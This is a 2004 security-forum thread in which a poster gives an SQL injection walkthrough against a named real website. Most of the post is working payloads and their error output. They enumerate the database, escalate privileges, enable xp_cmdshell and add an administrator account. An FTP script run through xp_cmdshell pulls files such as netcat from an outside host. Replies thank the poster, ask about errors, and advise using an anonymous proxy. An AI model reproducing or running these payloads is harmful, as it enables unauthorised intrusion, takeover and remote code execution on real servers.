Login or Register :: Home :: Search :: Your Account :: Forums :: Waraxe Advisories :: Tools :: July 27, 2024 Menu Home Logout Discussions Forums Members List IRC chat Tools Base64 coder MD5 hash CRC32 checksum ROT13 coder SHA-1 hash URL-decoder Sql Char Encoder Affiliates y3dips ITsec Md5 Cracker User Manuals AlbumNow Content Content Sections FAQ Top Info Feedback Recommend Us Search Journal Your Account User Info Welcome, Anonymous Nickname Password (Register) Membership: Latest: MichaelSnaRe New Today: 0 New Yesterday: 0 Overall: 9144 People Online: Visitors: 223 Members: 0 Total: 223 Full disclosure CyberDanube Security Research 20240722-0 | Multiple Vulnerabilities in Perten/PerkinElmer ProcessPlus [KIS-2024-06] XenForo <= 2.2.15 (Template System) Remote Code Execution Vulnerability [KIS-2024-05] XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability CVE-2024-33326 CVE-2024-33327 CVE-2024-33328 CVE-2024-33329 CyberDanube Security Research 20240703-0 | Authenticated Command Injection in Helmholz Industrial Router REX100 SEC Consult SA-20240627-0 :: Local Privilege Escalation via MSI installer in SoftMaker Office / FreeOffice SEC Consult SA-20240626-0 :: Multiple Vulnerabilities in Siemens Power Automation Products Novel DoS Vulnerability Affecting WebRTC Media Servers APPLE-SA-06-25-2024-1 AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8 40 vulnerabilities in Toshiba Multi-Function Printers 17 vulnerabilities in Sharp Multi-Function Printers SEC Consult SA-20240624-0 :: Multiple Vulnerabilities allowing complete bypass in Faronics WINSelect (Standard + Enterprise) IT Security and Insecurity Portal www.waraxe.us Forum Index -> Sql injection -> DO u think u know everything about sql injection heh? View previous topic :: View next topic DO u think u know everything about sql injection heh? Posted: Mon Dec 27, 2004 6:53 pm r0ot Regular user Joined: Jul 18, 2004 Posts: 15 Sorry i was missing almost a year from here.. but im back.. SQL INJECTION GATHERED FROM MASTERVN REVISION 0.1 RELEASE A EXAMPLE TO USE: http://www.nhaxinh.com.vn/FullStory.asp?id=1 Exploiting the hole: http://www.nhaxinh.com.vn/FullStory.asp?id=1' Code: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBCSQLServerDriver] [SQLServer] Unclosed quotation mark before the character string ''. /Including/general.asp, line 840\ VERSION http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,@@version)-- Code: [SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 7.00 - 7.00.1063 (Intel X86) Apr 9 2002 14:18:16 Copyright ? 1988-2002 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int. /Including/general.asp, line 840 SERVER NAME http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,@@servername)-- Code: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'UNESCO' to a column of data type int. /Including/general.asp, line 840 DATABASE NAME http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,db_name())-- Code: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'NhaXinh' to a column of data type int. /Including/general.asp, line 840 USER http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,system_user)-- Code: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'nhaxinh' to a column of data type int. /Including/general.asp, line 840 OPENING REMOTE LINK (http://msdn.microsoft.com/library/default.asp?url=/library/en-us/tsqlref/ts_oa-oz_78z8.asp) http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')-- Code: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server] Ad hoc access to OLE DB provider 'sqloledb' has been denied. You must access this provider through a linked server. /Including/general.asp, line 840 GUEST = DB_OWNER :DDD http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysusers' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''guest''','xx' exec sp_executesql N'drop view dbo.test'-- Code: No result expected, normal page loading Enable us to do sum nice stuff like xp_regwrite e xp_cmdshell ADDIN TO "BUILTIN\ADMINISTRATORS" http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysxlogins' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set xstatus=18 where name=''BUILTIN\ADMINISTRATORS''','xx' exec sp_executesql N'drop view dbo.test'-- and then http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master..sp_addsrvrolemember 'nhaxinh',sysadmin -- ENABLE OPENROWSET/OLEDB http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')-- Code: Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'SYSTEM'. /Including/general.asp, line 840 http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master..xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\Tcpip\Parameters','EnableSecurityFilters' ENABLE MASTER..XP_CMDSHELL & "ALLOW UPDATES" http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override') !!PAY ATTETION TO THE SERVER= PARAMETER Code: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Could not process object 'set fmtonly off master..sp_addextendedproc xp_cmd 'xpsql70.dll' exec sp_configure 'allow updates', '1' reconfigure with override'. The OLE DB provider 'sqloledb' indicates that the object has no columns. /Including/general.asp, line 840 if dun work try: http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')-- NOW SCRIPT KIDDIES http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'ipconfig'-- http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select top 1 b from t where b like '%25IP Address%25'))-- (%25 == ?%?) Code: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ' IP Address. . . . . . . . . . . . : 203.162.7.70 ' to a column of data type int. /Including/general.asp, line 840 C:\> ping 203.162.7.70 Pinging 203.162.7.70 with 32 bytes of data: Reply from 203.162.7.70: bytes=32 time=232ms TTL=118 C:\> ftp 203.162.7.70 Connected to 203.162.7.70. 220 unesco Microsoft FTP Service (Version 5.0). User (203.162.7.70:(none)): 203.162.7.70 == panvietnam.com http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec xp_cmdshell "net user a /add %26 net localgroup administrators a /add"')-- (%26 == "&") Code: C:\> ftp 203.162.7.70 Connected to 203.162.7.70. 220 unesco Microsoft FTP Service (Version 5.0). User (203.162.7.70:(none)): a 331 Password required for a. Password: 530 User a cannot log in. Login failed. ftp> bye UPLOAD NETCAT L?N http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..xp_cmdshell "echo open a.b.c.d %3Ef %26 echo user a a %3E%3Ef %26 echo bin %3E%3Ef %26 echo cd a %3E%3Ef %26 echo mget * %3E%3Ef %26 echo quit %3E%3Ef %26 ftp -v -i -n -s%3Af" %26 del f')-- (%3E == ">") Code: echo open a.b.c.d >f echo user a a >>f echo bin >> f echo cd a >>f echo mget * >>f echo quit >>f ftp -v -i -n -s:f del f http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'dir nx.exe'-- http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=1))-- http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=6))-- Code: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '08/17/2003 11:31a 11,776 nx.exe' to a column of data type int. /Including/general.asp, line 840 Enjoy and happy sql injection guys _________________ Posted: Mon Dec 27, 2004 9:18 pm Postal Regular user Joined: Dec 24, 2004 Posts: 5 Location: Latvija Nice to see you back! And thanks for this _________________ Born to learn!!! Posted: Mon Dec 27, 2004 10:43 pm any2000 Active user Joined: Dec 02, 2004 Posts: 26 very very thanks for this Posted: Mon Dec 27, 2004 11:44 pm r0ot Regular user Joined: Jul 18, 2004 Posts: 15 heheh its nice to come back again.. i spent hole year studing a lot and more important improving my sql admin / dev skills, as you can see above i got much to learn... :/ duh Comments bout the code, variations of it, etc are appreciated. Regards _________________ Posted: Wed Dec 29, 2004 5:15 pm ReFleX Active user Joined: Nov 05, 2004 Posts: 39 Location: ARGENTINA! Hi!, a very good job, I were trying it but i get this error when I execute the last injections Code: [Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'BUILTIN\Administrators'. Somebody know why coould this be?? Posted: Thu Dec 30, 2004 11:51 am r0ot Regular user Joined: Jul 18, 2004 Posts: 15 sum of the begginning queries dun worked out, so u couldnt add a user to the users... :/ bad..try to review the queries and re-exec it, remember always try to use a good anom proxy _________________ Posted: Sun Feb 13, 2005 11:05 am dairy123 Beginner Joined: Feb 13, 2005 Posts: 4 that was an extremely cool tut - so much thanks r00t. just in time as i was losing sleep tryin to figure out which sys tables, sps and xps to use you saved my so many nights !! looks like i am getting the same message Login failed for user 'BUILTIN\Administrators'. the sql admin seems to be a bit knowledgable - disabled select on the password column of sysxlogins any thoughts i can elevate the user's privileges? thnx much Posted: Tue Nov 01, 2005 7:13 am linzi Beginner Joined: Nov 01, 2005 Posts: 4 very good,i hv learn more sql injection skill from urs Posted: Thu Dec 08, 2005 11:46 am goblin Regular user Joined: Nov 03, 2005 Posts: 8 thx, you have a job! i am learning it now .so if someone want to injection like that ,you must master odbc Re: DO u think u know everything about sql injection heh? Posted: Thu Dec 08, 2005 11:47 am goblin Regular user Joined: Nov 03, 2005 Posts: 8 thx, you have a job! i am learning it now .so if someone want to injection like that ,you must master odbc Posted: Tue Dec 20, 2005 9:22 pm vcore Regular user Joined: Jun 28, 2005 Posts: 13 Thank you. Two questions: What's the diference beetwen AND and & and When i put 1 and 1=convert(int,@@version)-- i have a "type mismatch" (generally Cint), how should I fix this Sorry for my englisg DO u think u know everything about sql injection heh? www.waraxe.us Forum Index -> Sql injection You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum All times are GMT Page 1 of 1 All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1 YearOldest FirstNewest First Select a forumSecurity Research by waraxe----------------General discussionHow to fixMetasploit relatedHash cracking requests----------------MD5 hashesAll other hashesHash related informationhttp://www.waraxe.us portal----------------SuggestionsCooperation proposalsSecurity bugs and issues in general----------------Newbies cornerSql injectionCross-site scripting aka XSSRemote file inclusionFull path disclosureShell commands injectionPhishing and Social EngineeringAll other security holesVarious software----------------PhpNukePostNukePhpBBXMB forumvBulletin BoardInvision Power Boarde107MamboJoomlaXOOPSM$ WindowsLinux worldAll other softwareCoppermine Photo GalleryProgramming languages----------------PhpMySqlPerlJavaJavascriptC and C++Visual BasicBorland Delphi and PascalPythonHTML and XMLAssemblerReverse engineering----------------Newbies cornerDisassemblingPHP script decode requestsMiscellaneous stuff----------------Future of the ITNanotechnologyFun cornerLinksTry2hack sitesProxy databaseDirect Downloads----------------ToolsTutorialsWordlistsRecycle Bin----------------Removed messagesOutdated posts Powered by phpBB © 2001-2008 phpBB Group

Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.171 Seconds